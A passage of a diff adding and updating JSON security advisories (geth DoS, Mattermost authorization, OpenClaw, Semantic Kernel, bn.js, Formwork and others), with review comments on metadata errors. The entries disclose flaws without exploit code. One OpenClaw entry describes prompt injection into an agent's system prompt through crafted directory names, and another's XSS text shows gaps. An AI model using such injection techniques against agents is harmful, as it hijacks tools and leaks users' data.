@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gjw-fg97-vg3r", + "modified": "2026-02-20T16:46:27Z", + "published": "2026-02-18T22:35:15Z", + "aliases": [ + "CVE-2026-26314" + ], + "summary": "Go Ethereum affected by DoS via malicious p2p message", + "details": "### Impact\n\nA vulnerable node can be forced to shutdown/crash using a specially crafted message.\nMore details to be released later.\n\n### Patches\n\nThe problem is resolved in the v1.16.9 and v1.17.0 releases of Geth.\n\n### Credit\n\nThis issue was reported to the Ethereum Foundation Bug Bounty Program by Waleed Ahmed from vulsight.com", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/ethereum/go-ethereum" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.16.9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.16.8" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/security/advisories/GHSA-2gjw-fg97-vg3r" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26314" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/commit/895a8597cb16c02203e38707ed2d1da5c500fe60" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ethereum/go-ethereum" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/releases/tag/v1.16.9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:35:15Z", + "nvd_published_at": "2026-02-19T22:16:46Z" + } +} \ No newline at end of file 
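Review bot: The `details` string says the problem is resolved in both v1.16.9 and v1.17.0, but `references` links only the `v1.16.9` release tag; adding the corresponding v1.17.0 release-tag URL keeps the references in step with the stated patches. `More details to be released later` also means this entry will need a follow-up edit once the specifics are public, at which point the generic `CWE-20` classification may warrant revisiting. The `last_known_affected_version_range: "<= 1.16.8"` is consistent with the `fixed: "1.16.9"` event.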
diff --git a/advisories/unreviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json b/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json
similarity index 53%
rename from advisories/unreviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json
rename to advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json
index 0521f010c1e96..fa79c68079351 100644
--- a/advisories/unreviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json
+++ b/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json
@@ -1,11 +1,12 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2phx-frhf-xr55",
- "modified": "2026-02-16T12:30:24Z",
+ "modified": "2026-02-19T19:34:32Z",
 "published": "2026-02-16T12:30:24Z",
 "aliases": [
 "CVE-2026-0997"
 ],
+ "summary": "Mattermost Plugin Zoom allows any logged-in user to change Zoom meeting restrictions for arbitrary channels",
 "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 and Mattermost Plugin Zoom versions <=1.11.0 fail to validate the authenticated user when processing {{/plugins/zoom/api/v1/channel-preference}}, which allows any logged-in user to change Zoom meeting restrictions for arbitrary channels via crafted API requests.. Mattermost Advisory ID: MMSA-2025-00558",
 "severity": [
 {
@@ -13,12 +14,40 @@
 "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
 }
 ],
- "affected": [],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-plugin-zoom"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.11.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
 "references": [
 {
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0997"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mattermost/mattermost-plugin-zoom/commit/a8b58c43625ab25746e451acc4f71515d52c8122"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mattermost/mattermost-plugin-zoom"
+ },
 {
 "type": "WEB",
 "url": "https://mattermost.com/security-updates"
@@ -29,8 +58,8 @@
 "CWE-863"
 ],
 "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-19T19:34:32Z",
 "nvd_published_at": "2026-02-16T10:16:07Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json
new file mode 100644
index 0000000000000..a0a0c5b5f1d21
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json
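Review bot: The new `affected` range in the `@@ -13,12 +14,40 @@` hunk sets `fixed: "1.11.0"`, but the `details` string states that `Mattermost Plugin Zoom versions <=1.11.0` are vulnerable, so 1.11.0 is excluded from the range that the text says includes it. The `fixed` event should name the first release that contains the referenced commit `a8b58c43625ab25746e451acc4f71515d52c8122` (placeholder: `"fixed": "<FIRST_PATCHED_PLUGIN_VERSION>"`), or the text should be corrected if 1.11.0 is in fact the patched release; the Mattermost security-updates page already in `references` should settle which. The `details` also list affected Mattermost server versions (11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1) for which no `affected` entry exists; if the server side is part of this CVE those need entries too, otherwise the text should say the plugin alone is in scope.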
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qj5-gwg2-xwc4", + "modified": "2026-02-20T16:46:56Z", + "published": "2026-02-18T22:42:29Z", + "aliases": [ + "CVE-2026-27001" + ], + "summary": "OpenClaw: Unsanitized CWD path injection into LLM prompts", + "details": "## Overview\nOpenClaw embedded the current working directory (workspace path) into the agent system prompt without sanitization. If an attacker can cause OpenClaw to run inside a directory whose name contains control/format characters (for example newlines or Unicode bidi/zero-width markers), those characters could break the prompt structure and inject attacker-controlled instructions.\n\n## Impact\nPrompt injection may alter agent behavior and could lead to unintended tool use or disclosure of sensitive information.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Vulnerable versions: `< 2026.2.15` (latest published vulnerable version as of 2026-02-16: `2026.2.14`)\n- Patched versions: `>= 2026.2.15`\n\n## Fix\nThe workspace path is now sanitized before it is embedded into any LLM prompt output, stripping Unicode control/format characters and explicit line/paragraph separators. 
Workspace path resolution also applies the same sanitization as defense-in-depth.\n\n## Fix Commit(s)\n- `6254e96acf16e70ceccc8f9b2abecee44d606f79`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qj5-gwg2-xwc4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27001" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/6254e96acf16e70ceccc8f9b2abecee44d606f79" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:42:29Z", + "nvd_published_at": "2026-02-20T00:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json index 906376b23efae..92c8917e68d26 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json +++ b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json 
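Review bot: `cwe_ids` for GHSA-2qj5-gwg2-xwc4 is `CWE-77` (command injection), but the weakness described is prompt injection through unsanitised path characters reaching an LLM system prompt; CWE has a dedicated entry, CWE-1427 (Improper Neutralization of Input Used for LLM Prompting), which is the more precise classification if the database's CWE list includes it, with `CWE-74` as the generic injection fallback. The CVSS 4.0 vector's `AV:L` agrees with the `details` text that the attacker must already control the directory the agent runs in; stating that precondition in the `summary` as well would help, since `Unsanitized CWD path injection into LLM prompts` on its own reads as remotely reachable.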
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-2ww3-72rp-wpp4", - "modified": "2026-02-06T21:43:53Z", + "modified": "2026-02-20T19:15:43Z", "published": "2026-02-06T18:37:24Z", "aliases": [ "CVE-2026-25592" ], "summary": "Semantic Kernel has Arbitrary File Write via AI Agent Function Calling in .NET SDK", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nThe problem has been fixed in [Microsoft.SemanticKernel.Core version 1.70.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Core/1.70.0). Users should upgrade to version 1.70.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", + "details": "### Impact\n_What kind of vulnerability is it? 
Who is impacted?_\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nThe problem has been fixed in [Microsoft.SemanticKernel.Plugins.Core version 1.71.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Plugins.Core/1.71.0). Users should upgrade to version 1.71.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", "severity": [ { "type": "CVSS_V3", @@ -17,8 +17,8 @@ "affected": [ { "package": { - "ecosystem": "NuGet", - "name": "Microsoft.SemanticKernel.Core" + "ecosystem": "PyPI", + "name": "semantic-kernel" }, "ranges": [ { @@ -28,7 +28,7 @@ "introduced": "0" }, { - "fixed": "1.70.0" + "fixed": "1.39.3" } ] } @@ -36,8 +36,8 @@ }, { "package": { - "ecosystem": "PyPI", - "name": "semantic-kernel" + "ecosystem": "NuGet", + "name": "Microsoft.SemanticKernel.Core" }, "ranges": [ { 
@@ -47,7 +47,7 @@ "introduced": "0" }, { - "fixed": "1.39.3" + "fixed": "1.71.0" } ] } diff --git a/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json b/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json index 624c28abfcc61..f8331a758a47e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json +++ b/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json @@ -51,7 +51,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-522" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json b/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json new file mode 100644 index 0000000000000..b34cd5da7c006 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json 
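Review bot: The NuGet `affected` entry in this hunk still names `Microsoft.SemanticKernel.Core` (now with `fixed: 1.71.0`), while the rewritten `details` in the first hunk say the fix shipped in `Microsoft.SemanticKernel.Plugins.Core` 1.71.0, so the machine-readable data and the prose disagree on which package to match. Scanners key on `affected[].package.name`, so a project that references only the plugins package (where `SessionsPythonPlugin` lives per the details) would not be flagged; if the plugins package carries the fix the entry should read `"name": "Microsoft.SemanticKernel.Plugins.Core"`, or both packages should be listed if both changed. The PyPI `semantic-kernel` entry (`fixed: 1.39.3`) is not mentioned anywhere in `details`, which only discuss the .NET SDK, so it is worth confirming that the Python package really contains the same plugin and fix rather than being carried over from an earlier revision.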
@@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3288-p39f-rqpv", + "modified": "2026-02-19T15:17:41Z", + "published": "2026-02-19T15:17:41Z", + "aliases": [], + "summary": "Unsoundness in opt-in ARMv8 assembly backend for `keccak`", + "details": "### Summary\n\nThe `asm!` block enabled by the off-by-default `asm` feature, when enabled on ARMv8 targets, misspecified the operand\ntype for all of its operands, using `in` for pointers and values which were subsequently mutated by operations performed\nwithin the assembly block.\n\n### Impact\n\nIt's unclear what practical impact, if any, this actually had. Incorrect operand types are technically undefined\nbehavior, however changing them had no actual impact on the generated assembly for these targets. The possibility still\nexists that it may lead to potential memory safety or other issues on hypothetical future versions of rustc.\n\n### Mitigation\n\nThe operand types were changed from `in` to `inout`, and the impacted versions of the `keccak` crate were yanked.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "keccak" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.1.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/RustCrypto/sponges/pull/101" + }, + { + "type": "WEB", + "url": "https://github.com/RustCrypto/sponges/commit/7ac1920198ebb7d0192e6d2c3581e15b38a6e0e5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/RustCrypto/sponges" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2026-0012.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-758" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T15:17:41Z", + "nvd_published_at": null + } +} \ No newline at end 
of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json b/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json index 34c9265b95e5b..e1ac8f6e24636 100644 --- a/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json +++ b/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33fm-6gp7-4p47", - "modified": "2026-02-17T16:37:55Z", + "modified": "2026-02-19T20:30:31Z", "published": "2026-02-17T16:37:55Z", "aliases": [ "CVE-2026-24126" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-33fm-6gp7-4p47" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24126" + }, { "type": "WEB", "url": "https://github.com/WeblateOrg/weblate/pull/17722" @@ -60,6 +64,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-17T16:37:55Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T00:16:21Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json b/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json new file mode 100644 index 0000000000000..8fc9c6ffc6896 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json 
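Review bot: The keccak `affected` range starts at `introduced: "0"`, but `details` say the unsound `asm!` block exists only behind the off-by-default `asm` feature on ARMv8 targets, so the range over-reports every consumer who never enabled that feature and every release that predates the backend; if the release that added the ARMv8 backend is known the range should start there, and a line such as `Only builds enabling the asm feature on aarch64 targets are affected; cargo tree -e features -i keccak shows whether a dependency enables it.` would save triage. The Mitigation paragraph relies on yanking, which does not affect versions already pinned in a `Cargo.lock`; those users need an explicit `cargo update -p keccak`, and the advisory could say so. The LOW severity and `E:U` in the CVSS v4 vector are consistent with the advisory's own statement that the generated assembly did not change.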
@@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33hq-fvwr-56pm", + "modified": "2026-02-19T20:29:30Z", + "published": "2026-02-19T20:29:30Z", + "aliases": [], + "summary": "devalue affected by CPU and memory amplification from sparse arrays", + "details": "Under certain circumstances, serializing sparse arrays using `uneval` or `stringify` could cause CPU and/or memory exhaustion. When this occurs on the server, it results in a DoS. This is extremely difficult to take advantage of in practice, as an attacker would have to manage to create a sparse array on the server — which is impossible in every mainstream wire format — and then that sparse array would have to be run through `uneval` or `stringify`.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "devalue" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.6.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.6.2" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/security/advisories/GHSA-33hq-fvwr-56pm" + }, + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/commit/819f1ac7475ab37547645cfb09bf2f678a799cf0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sveltejs/devalue" + }, + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/releases/tag/v5.6.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:29:30Z", + "nvd_published_at": null + } +} \ No newline at end of file 
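Review bot: The `details` claim that creating a sparse array on the server is "impossible in every mainstream wire format" does not address devalue's own serialization format, which as far as I recall can round-trip array holes through `parse`/`unflatten`; a server that parses devalue payloads and re-serializes them with `stringify` or `uneval` would then be a plausible path, so the claim should be confirmed and, if so, narrowed to JSON-style formats. The CVSS v4 vector's `AC:H` and `E:U` already reflect the difficulty, so only the prose needs tightening. `last_known_affected_version_range: <= 5.6.2` is consistent with `fixed: 5.6.3`.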
diff --git a/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json new file mode 100644 index 0000000000000..d93d859f2120c --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json 
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34p4-7w83-35g2", + "modified": "2026-02-23T22:27:29Z", + "published": "2026-02-19T20:31:07Z", + "aliases": [ + "CVE-2026-27198" + ], + "summary": "Formwork Improperly Managed Privileges in User creation", + "details": "### Summary\n\nThe application fails to properly enforce role-based authorization during account creation. Although the system validates that the specified role exists, it does not verify whether the current user has sufficient privileges to assign highly privileged roles such as admin. As a result, an authenticated user with the editor role can create a new account with administrative privileges, leading to full administrative access and complete compromise of the CMS.\n\n### Impact\n\nSuccessful exploitation allows an attacker to:\n- Gain full administrative control over the CMS.\n- Access all site data and user information. \n- Modify system configuration and security settings.\n- Create, modify, or delete any user account, including legitimate administrators.\n\n### Patches\n\n[Formwork 2.3.4](https://github.com/getformwork/formwork/releases/tag/2.3.4) properly assigns roles on user creation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "getformwork/formwork" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.3.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.3.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/security/advisories/GHSA-34p4-7w83-35g2" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27198" + }, + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/commit/19390a0b408e084bdef86f3581e050f3ee51e7cd" + }, + { + "type": "PACKAGE", + 
"url": "https://github.com/getformwork/formwork" + }, + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/releases/tag/2.3.4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:31:07Z", + "nvd_published_at": "2026-02-21T06:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json new file mode 100644 index 0000000000000..0955af09fee2e --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json 
@@ -0,0 +1,112 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-378v-28hj-76wf", + "modified": "2026-02-24T14:45:53Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-2739" + ], + "summary": "bn.js affected by an infinite loop", + "details": "This affects versions of the package bn.js before 4.12.3 and 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "bn.js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.12.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "bn.js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.2.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2739" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/186" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/316" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/316#issuecomment-3924217358" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/pull/317" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/commit/33df26b5771e824f303a79ec6407409376baa64b" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Kr0emer/02370d18328c28b5dd7f9ac880d22a91" + }, + { + "type": "PACKAGE", + "url": "https://github.com/indutny/bn.js" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/releases/tag/v5.2.3" + }, + { + "type": "WEB", + "url": 
"https://security.snyk.io/vuln/SNYK-JS-BNJS-15274301" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-835" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:18:31Z", + "nvd_published_at": "2026-02-20T05:17:53Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json new file mode 100644 index 0000000000000..15ac4ab2878ea --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json 
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-37gc-85xm-2ww6", + "modified": "2026-02-20T16:47:40Z", + "published": "2026-02-18T22:44:33Z", + "aliases": [ + "CVE-2026-27009" + ], + "summary": "OpenClaw affected by Stored XSS in Control UI via unsanitized assistant name/avatar in inline script injection", + "details": "## Summary\nStored XSS in the OpenClaw Control UI when rendering assistant identity (name/avatar) into an inline `` could break out of the script tag and execute attacker-controlled JavaScript in the Control UI origin.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.14`\n- Fixed in: `>= 2026.2.15` (next release; fix is already merged on `main`)\n\n## Details\nThe gateway Control UI HTML response previously injected `assistantName` and `assistantAvatar` directly into an inline `` from terminating the script element, enabling stored XSS if an operator/admin sets the assistant identity to a malicious string.\n\nOpenClaw’s Control UI is intended for local use only (see `SECURITY.md`); this advisory’s CVSS reflects a loopback-only/local-access deployment assumption.\n\n## Impact\nAn attacker with the ability to set assistant identity values (config or agent identity) could cause JavaScript execution for Control UI visitors, enabling token/session theft and privileged actions in the UI.\n\n## Fix\n- Removed inline script injection and serve bootstrap config from a JSON endpoint.\n- Added a restrictive Content Security Policy for the Control UI (`script-src 'self'`, no inline scripts).\n\n## Fix Commit(s)\n- `adc818db4a4b3b8d663e7674ef20436947514e1b`\n- `3b4096e02e7e335f99f5986ec1bd566e90b14a7e`\n\n## Release Process Note\nThis advisory pre-sets the patched version to the planned next release (`2026.2.15`). 
Once that version is published to npm, this advisory can be published without further edits.\n\nThanks @Adam55A-code for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37gc-85xm-2ww6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27009" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/3b4096e02e7e335f99f5986ec1bd566e90b14a7e" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/adc818db4a4b3b8d663e7674ef20436947514e1b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + 